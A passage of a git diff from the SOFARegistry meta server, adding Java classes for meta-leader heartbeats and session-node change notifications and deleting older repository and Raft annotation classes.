metaServerRegistry.register(sessionNode); - LOGGER.info("Session node {} register success!", sessionNode); - } catch (Exception e) { - LOGGER.error("Session node register error!", e); - throw new RuntimeException("Session node register error!", e); - } - return nodeChangeResult; - } - - @Override - public Class interest() { - return SessionNode.class; - } - - @Override - public HandlerType getType() { - return HandlerType.PROCESSER; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaNodeExchange.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaNodeExchange.java new file mode 100644 index 000000000..c1e2f28cb --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaNodeExchange.java @@ -0,0 +1,127 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.meta; + +import com.alipay.sofa.common.profile.StringUtil; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.ChannelHandler; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.remoting.exchange.RequestException; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.remoting.exchange.message.Response; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.shared.remoting.ClientSideExchanger; +import java.util.Collection; +import java.util.Collections; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: MetaNodeExchange.java, v 0.1 2021年03月29日 16:08 xiaojian.xj Exp $ + */ +public class MetaNodeExchange extends ClientSideExchanger { + + private static final Logger LOGGER = LoggerFactory.getLogger(MetaNodeExchange.class); + + @Autowired private MetaServerConfig metaServerConfig; + + @Autowired private MetaLeaderService metaLeaderService; + + protected volatile String metaLeader; + + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + + public MetaNodeExchange() { + super(Exchange.META_SERVER_TYPE); + } + + @Override + public int getRpcTimeoutMillis() { + return metaServerConfig.getMetaNodeExchangeTimeoutMillis(); + } + + @Override + public int getServerPort() { + return metaServerConfig.getMetaServerPort(); + } + + @Override + protected Collection getClientHandlers() { + return Collections.emptyList(); + } + + @Override + public int getConnNum() { + return 3; + } + + public Response sendRequest(Object requestBody) throws RequestException { + final String newLeader = metaLeaderService.getLeader(); + if (!StringUtil.equals(metaLeader, newLeader) || boltExchange.getClient(serverType) == null) { + setLeaderAndConnect(newLeader); + } + + Request request = + new Request() { + @Override + public Object getRequestBody() { + return requestBody; + } + + @Override + public URL getRequestUrl() { + return new URL(newLeader, getServerPort()); + } + }; + return request(request); + } + + private void setLeaderAndConnect(String newLeader) { + String removed = metaLeader; + try { + lock.writeLock().lock(); + metaLeader = newLeader; + } finally { + lock.writeLock().unlock(); + } + + try { + LOGGER.info( + "[setLeaderAndConnect][reset leader when heartbeat] connect meta leader: {}", + newLeader, + removed); + connect(new URL(newLeader, metaServerConfig.getMetaServerPort())); + + } catch (Throwable th) { + LOGGER.error("[setLeaderAndConnect]", th); + } + } + + /** + * Getter method for property metaLeader. + * + * @return property value of metaLeader + */ + public String getMetaLeader() { + return metaLeader; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaServerRenewService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaServerRenewService.java new file mode 100644 index 000000000..638683692 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/meta/MetaServerRenewService.java @@ -0,0 +1,106 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.meta; + +import com.alipay.sofa.registry.common.model.GenericResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.MetaNode; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.bootstrap.config.MetaServerConfig; +import com.alipay.sofa.registry.server.meta.bootstrap.config.NodeConfig; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.WakeUpLoopRunnable; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author xiaojian.xj + * @version $Id: MetaServerRenewService.java, v 0.1 2021年03月26日 20:29 xiaojian.xj Exp $ + */ +public class MetaServerRenewService { + + protected final Logger LOGGER = LoggerFactory.getLogger(getClass()); + + @Autowired private MetaLeaderService metaLeaderService; + + @Autowired private NodeConfig nodeConfig; + + @Autowired protected MetaNodeExchange metaNodeExchange; + + @Autowired protected MetaServerConfig metaServerConfig; + + private Renewer renewer; + + public synchronized void startRenewer(int intervalMs) { + + if (renewer != null) { + throw new IllegalStateException("has started renewer"); + } + this.renewer = new Renewer(intervalMs); + ConcurrentUtils.createDaemonThread("metaNode-renewer", this.renewer).start(); + } + + private final class Renewer extends WakeUpLoopRunnable { + final int intervalMs; + + Renewer(int intervalMs) { + this.intervalMs = intervalMs; + } + + @Override + public void runUnthrowable() { + try { + + // heartbeat on leader + renewNode(); + } catch (Throwable e) { + LOGGER.error("failed to renewNode", e); + } + } + + @Override + public int getWaitingMillis() { + return intervalMs; + } + } + + public void renewNode() { + final String leaderIp = metaLeaderService.getLeader(); + HeartbeatRequest heartbeatRequest = + new HeartbeatRequest<>( + createNode(), -1L, nodeConfig.getLocalDataCenter(), System.currentTimeMillis(), null); + + LOGGER.info( + "[MetaServerRenewService] renew to meta leader:{} request:{}", leaderIp, heartbeatRequest); + GenericResponse resp = + (GenericResponse) metaNodeExchange.sendRequest(heartbeatRequest).getResult(); + + if (resp == null || !resp.isSuccess()) { + LOGGER.error( + "[RenewNodeTask] renew meta node to metaLeader error, leader: {}, resp: {}", + leaderIp, + resp); + } + } + + private MetaNode createNode() { + return new MetaNode(new URL(ServerEnv.IP), nodeConfig.getLocalDataCenter()); + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifier.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifier.java new file mode 100644 index 000000000..ed8eb2196 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/AbstractNotifier.java @@ -0,0 +1,183 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.notifier; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.metaserver.SlotTableChangeEvent; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.CallbackHandler; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.remoting.exchange.message.Request; +import com.alipay.sofa.registry.server.meta.MetaLeaderService; +import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.DefaultExecutorFactory; +import com.alipay.sofa.registry.util.OsUtils; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Sets; +import java.net.InetSocketAddress; +import java.util.Collection; +import java.util.List; +import java.util.Set; +import java.util.concurrent.Executor; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.atomic.AtomicInteger; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author chen.zhu + *

Feb 23, 2021 + */ +public abstract class AbstractNotifier implements Notifier { + + protected final Logger logger = LoggerFactory.getLogger(getClass()); + + @Autowired private MetaLeaderService metaLeaderService; + + private Executor executors = + DefaultExecutorFactory.createCachedThreadPoolFactory( + getClass().getSimpleName(), + Math.min(4, OsUtils.getCpuCount()), + 60 * 1000, + TimeUnit.MILLISECONDS) + .create(); + + @Override + public void notifySlotTableChange(SlotTable slotTable) { + if (metaLeaderService.amIStableAsLeader()) { + new NotifyTemplate() + .broadcast(new SlotTableChangeEvent(slotTable.getEpoch())); + } + } + + @Override + public void notifyProvideDataChange(ProvideDataChangeEvent event) { + new NotifyTemplate().broadcast(event); + } + + @VisibleForTesting + public AbstractNotifier setExecutors(Executor executors) { + this.executors = executors; + return this; + } + + protected abstract NodeExchanger getNodeExchanger(); + + protected abstract List getNodes(); + + protected abstract NodeConnectManager getNodeConnectManager(); + + public final class NotifyTemplate { + + public void broadcast(E event) { + NodeConnectManager nodeConnectManager = getNodeConnectManager(); + Collection connections = nodeConnectManager.getConnections(null); + + if (connections == null || connections.isEmpty()) { + logger.error("Push Node list error! No node connected!"); + return; + } + + List nodes = getNodes(); + + if (nodes == null || nodes.isEmpty()) { + logger.error("Node list error! No node registered!"); + return; + } + Set ipAddresses = Sets.newHashSet(); + nodes.forEach(node -> ipAddresses.add(node.getNodeUrl().getIpAddress())); + new ConcurrentUtils.SafeParaLoop(executors, connections) { + @Override + protected void doRun0(InetSocketAddress connection) throws Exception { + if (!ipAddresses.contains(connection.getAddress().getHostAddress())) { + return; + } + getNodeExchanger().request(new SimpleRequest(event, connection, executors)); + } + }.run(); + } + } + + private static final class SimpleRequest implements Request { + + private static final Logger logger = LoggerFactory.getLogger(SimpleRequest.class); + + private final E event; + + private final InetSocketAddress connection; + + private final Executor executors; + + public SimpleRequest(E event, InetSocketAddress connection, Executor executors) { + this.event = event; + this.connection = connection; + this.executors = executors; + } + + @Override + public E getRequestBody() { + return event; + } + + @Override + public URL getRequestUrl() { + return new URL(connection); + } + + @Override + public CallbackHandler getCallBackHandler() { + return new CallbackHandler() { + @Override + public void onCallback(Channel channel, Object message) { + logger.info( + "[onCallback] notify slot-change succeed, ({}): [{}]", + channel != null ? channel.getRemoteAddress() : "unknown channel", + message); + } + + @Override + public void onException(Channel channel, Throwable exception) { + logger.error( + "[onException] notify slot-change failed, ({})", + channel != null ? channel.getRemoteAddress() : "unknown channel", + exception); + } + + @Override + public Executor getExecutor() { + return executors; + } + }; + } + + @Override + public AtomicInteger getRetryTimes() { + return new AtomicInteger(3); + } + } + + @VisibleForTesting + AbstractNotifier setMetaLeaderService(MetaLeaderService metaLeaderService) { + this.metaLeaderService = metaLeaderService; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/Notifier.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/Notifier.java new file mode 100644 index 000000000..5cdb45cbf --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/notifier/Notifier.java @@ -0,0 +1,31 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.notifier; + +import com.alipay.sofa.registry.common.model.metaserver.ProvideDataChangeEvent; +import com.alipay.sofa.registry.common.model.slot.SlotTable; + +/** + * @author chen.zhu + *

Feb 23, 2021 + */ +public interface Notifier { + + void notifySlotTableChange(SlotTable slotTable); + + void notifyProvideDataChange(ProvideDataChangeEvent event); +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerService.java new file mode 100644 index 000000000..91ca1682c --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/DefaultSessionServerService.java @@ -0,0 +1,78 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.session; + +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; +import com.alipay.sofa.registry.server.meta.lease.session.SessionServerManager; +import com.alipay.sofa.registry.server.meta.remoting.SessionNodeExchanger; +import com.alipay.sofa.registry.server.meta.remoting.connection.NodeConnectManager; +import com.alipay.sofa.registry.server.meta.remoting.connection.SessionConnectionManager; +import com.alipay.sofa.registry.server.meta.remoting.notifier.AbstractNotifier; +import com.google.common.annotations.VisibleForTesting; +import java.util.List; +import org.springframework.beans.factory.annotation.Autowired; +import org.springframework.stereotype.Component; + +/** + * @author chen.zhu + *

Dec 03, 2020 + */ +@Component +public class DefaultSessionServerService extends AbstractNotifier + implements SessionServerService { + + @Autowired private SessionNodeExchanger sessionNodeExchanger; + + @Autowired private SessionConnectionManager sessionConnectionManager; + + @Autowired private SessionServerManager sessionServerManager; + + @Override + protected NodeExchanger getNodeExchanger() { + return sessionNodeExchanger; + } + + @Override + protected List getNodes() { + return sessionServerManager.getSessionServerMetaInfo().getClusterMembers(); + } + + @Override + protected NodeConnectManager getNodeConnectManager() { + return sessionConnectionManager; + } + + @VisibleForTesting + DefaultSessionServerService setSessionNodeExchanger(SessionNodeExchanger sessionNodeExchanger) { + this.sessionNodeExchanger = sessionNodeExchanger; + return this; + } + + @VisibleForTesting + DefaultSessionServerService setSessionConnectionHandler( + SessionConnectionManager sessionConnectionManager) { + this.sessionConnectionManager = sessionConnectionManager; + return this; + } + + @VisibleForTesting + DefaultSessionServerService setSessionServerManager(SessionServerManager sessionServerManager) { + this.sessionServerManager = sessionServerManager; + return this; + } +} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/SessionServerService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/SessionServerService.java new file mode 100644 index 000000000..4451033c0 --- /dev/null +++ b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/remoting/session/SessionServerService.java @@ -0,0 +1,25 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.meta.remoting.session; + +import com.alipay.sofa.registry.server.meta.remoting.notifier.Notifier; + +/** + * @author chen.zhu + *

Feb 23, 2021 + */ +public interface SessionServerService extends Notifier {} diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeConfirmStatusService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeConfirmStatusService.java deleted file mode 100644 index 93615dce1..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeConfirmStatusService.java +++ /dev/null @@ -1,53 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.common.model.metaserver.DataOperator; -import com.alipay.sofa.registry.server.meta.node.NodeOperator; -import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; - -import java.util.Collection; -import java.util.Map; -import java.util.Queue; - -/** - * - * @author shangyu.wh - * @version $Id: NodeConfirmStatusService.java, v 0.1 2018-05-15 17:49 shangyu.wh Exp $ - */ -public interface NodeConfirmStatusService { - - void putConfirmNode(T node, DataOperator nodeOperate); - - @ReadOnLeader - NodeOperator peekConfirmNode(); - - NodeOperator pollConfirmNode() throws InterruptedException; - - @ReadOnLeader - Queue getAllConfirmNodes(); - - Map putExpectNodes(T confirmNode, Map addNodes); - - @ReadOnLeader - Map getExpectNodes(T confirmNode); - - Map removeExpectNodes(T confirmNode); - - Map removeExpectConfirmNodes(T confirmNode, Collection ips); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeRepository.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeRepository.java deleted file mode 100644 index cdbde6fd9..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/NodeRepository.java +++ /dev/null @@ -1,112 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository; - -import com.alipay.sofa.registry.common.model.Node; -import com.alipay.sofa.registry.server.meta.store.RenewDecorate; - -import java.io.Serializable; -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: NodeRepository.java, v 0.1 2018-07-20 14:49 shangyu.wh Exp $ - */ -public class NodeRepository implements Serializable { - - /** - * store node list existed dataCenter - */ - private String dataCenter; - - /** - * store node ip list,and it expired info - */ - private Map> nodeMap; - - /** - * store current dataCenter's node list version - */ - private Long version; - - /** - * constructor - * @param dataCenter - * @param nodeMap - * @param version - */ - public NodeRepository(String dataCenter, Map> nodeMap, Long version) { - this.dataCenter = dataCenter; - this.nodeMap = nodeMap; - this.version = version; - } - - /** - * Getter method for property dataCenter. - * - * @return property value of dataCenter - */ - public String getDataCenter() { - return dataCenter; - } - - /** - * Setter method for property dataCenter. - * - * @param dataCenter value to be assigned to property dataCenter - */ - public void setDataCenter(String dataCenter) { - this.dataCenter = dataCenter; - } - - /** - * Getter method for property nodeMap. - * - * @return property value of nodeMap - */ - public Map> getNodeMap() { - return nodeMap; - } - - /** - * Setter method for property nodeMap. - * - * @param nodeMap value to be assigned to property nodeMap - */ - public void setNodeMap(Map> nodeMap) { - this.nodeMap = nodeMap; - } - - /** - * Getter method for property version. - * - * @return property value of version - */ - public Long getVersion() { - return version; - } - - /** - * Setter method for property version. - * - * @param version value to be assigned to property version - */ - public void setVersion(Long version) { - this.version = version; - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/RepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/RepositoryService.java deleted file mode 100644 index 414325dd6..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/RepositoryService.java +++ /dev/null @@ -1,55 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository; - -import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; - -import java.util.Map; - -/** - * - * @author shangyu.wh - * @version $Id: RepositoryService.java, v 0.1 2018-05-07 16:03 shangyu.wh Exp $ - */ -public interface RepositoryService { - - V put(K key, V value); - - V remove(Object key); - - V replace(K key, V value); - - @ReadOnLeader - V get(Object key); - - @ReadOnLeader - Map getAllData(); - - @ReadOnLeader - Map> getAllDataMap(); - - @ReadOnLeader - Map getNodeRepositories(); - - Map replaceAll(String dataCenter, Map map, Long version); - - @ReadOnLeader - boolean checkVersion(K key, Long version); - - @ReadOnLeader - Long getVersion(K key); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/VersionRepositoryService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/VersionRepositoryService.java deleted file mode 100644 index f7a3fde8a..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/VersionRepositoryService.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository; - -import com.alipay.sofa.registry.store.api.annotation.ReadOnLeader; - -/** - * - * @author shangyu.wh - * @version $Id: VersionRepositoryService.java, v 0.1 2018-05-11 11:59 shangyu.wh Exp $ - */ -public interface VersionRepositoryService { - - /** - * check current meta server store node Info version change,and notify other meta update dataCenter node info - * @param key such as dataCenterId - * @param version - * @return - */ - boolean checkAndUpdateVersions(K key, Long version); - - @ReadOnLeader - Long getVersion(K key); -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/annotation/RaftAnnotationBeanPostProcessor.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/annotation/RaftAnnotationBeanPostProcessor.java deleted file mode 100644 index 4ee37ec1a..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/annotation/RaftAnnotationBeanPostProcessor.java +++ /dev/null @@ -1,141 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.meta.repository.annotation; - -import com.alipay.sofa.registry.jraft.bootstrap.RaftClient; -import com.alipay.sofa.registry.jraft.processor.Processor; -import com.alipay.sofa.registry.jraft.processor.ProxyHandler; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.meta.remoting.RaftExchanger; -import com.alipay.sofa.registry.store.api.annotation.RaftReference; -import com.alipay.sofa.registry.store.api.annotation.RaftService; -import org.springframework.aop.framework.AopProxyUtils; -import org.springframework.beans.BeansException; -import org.springframework.beans.factory.annotation.Autowired; -import org.springframework.beans.factory.config.BeanPostProcessor; -import org.springframework.core.Ordered; -import org.springframework.util.ReflectionUtils; - -import java.lang.reflect.Modifier; -import java.lang.reflect.Proxy; - -/** - * - * @author shangyu.wh - * @version $Id: AnnotationBeanPostProcessor.java, v 0.1 2018-05-22 22:44 shangyu.wh Exp $ - */ -public class RaftAnnotationBeanPostProcessor implements BeanPostProcessor, Ordered { - - private static final Logger LOGGER = LoggerFactory - .getLogger(RaftAnnotationBeanPostProcessor.class); - - @Autowired - private RaftExchanger raftExchanger; - - @Override - public Object postProcessBeforeInitialization(Object bean, String beanName) - throws BeansException { - processRaftReference(bean); - return bean; - } - - @Override - public Object postProcessAfterInitialization(Object bean, String beanName) - throws BeansException { - processRaftService(bean, beanName); - return bean; - } - - private void processRaftReference(Object bean) { - final Class beanClass = bean.getClass(); - - ReflectionUtils.doWithFields(beanClass, field -> { - RaftReference referenceAnnotation = field.getAnnotation(RaftReference.class); - - if (referenceAnnotation == null) { - return; - } - - Class interfaceType = referenceAnnotation.interfaceType(); - - if (interfaceType.equals(void.class)) { - interfaceType = field.getType(); - } - String serviceId = getServiceId(interfaceType, referenceAnnotation.uniqueId()); - Object proxy = getProxy(interfaceType, serviceId); - ReflectionUtils.makeAccessible(field); - ReflectionUtils.setField(field, bean, proxy); - - }, field -> !Modifier.isStatic(field.getModifiers()) - && field.isAnnotationPresent(RaftReference.class)); - } - - private Object getProxy(Class interfaceType, String serviceId) { - RaftClient client = raftExchanger.getRaftClient(); - if (client == null) { - raftExchanger.startRaftClient(); - LOGGER.info("Raft client before started!"); - } - return Proxy.newProxyInstance(Thread.currentThread().getContextClassLoader(), - new Class[] { interfaceType }, new ProxyHandler(interfaceType, serviceId, - raftExchanger.getRaftClient())); - } - - private void processRaftService(Object bean, String beanName) { - - final Class beanClass = AopProxyUtils.ultimateTargetClass(bean); - - RaftService raftServiceAnnotation = beanClass.getAnnotation(RaftService.class); - - if (raftServiceAnnotation == null) { - return; - } - - Class interfaceType = raftServiceAnnotation.interfaceType(); - - if (interfaceType.equals(void.class)) { - Class[] interfaces = beanClass.getInterfaces(); - - if (interfaces == null || interfaces.length == 0 || interfaces.length > 1) { - throw new RuntimeException( - "Bean " + beanName - + " does not has any interface or has more than one interface."); - } - - interfaceType = interfaces[0]; - } - String serviceUniqueId = getServiceId(interfaceType, raftServiceAnnotation.uniqueId()); - Processor.getInstance().addWorker(serviceUniqueId, interfaceType, bean); - } - - @Override - public int getOrder() { - return Ordered.LOWEST_PRECEDENCE; - } - - private String getServiceId(Class interfaceType, String uniqueId) { - if (interfaceType == null) { - throw new IllegalArgumentException("Get serviceId error!interfaceType can not be null!"); - } - if (uniqueId != null && !uniqueId.isEmpty()) { - return interfaceType.getName() + ":" + uniqueId; - } else { - return interfaceType.getName(); - } - } -} \ No newline at end of file diff --git a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataConfirmStatusService.java b/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataConfirmStatusService.java deleted file mode 100644 index a290669d3..000000000 --- a/server/server/meta/src/main/java/com/alipay/sofa/registry/server/meta/repository/service/DataConfirmStatusService.java +++ /dev/null @@ -1,205 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work 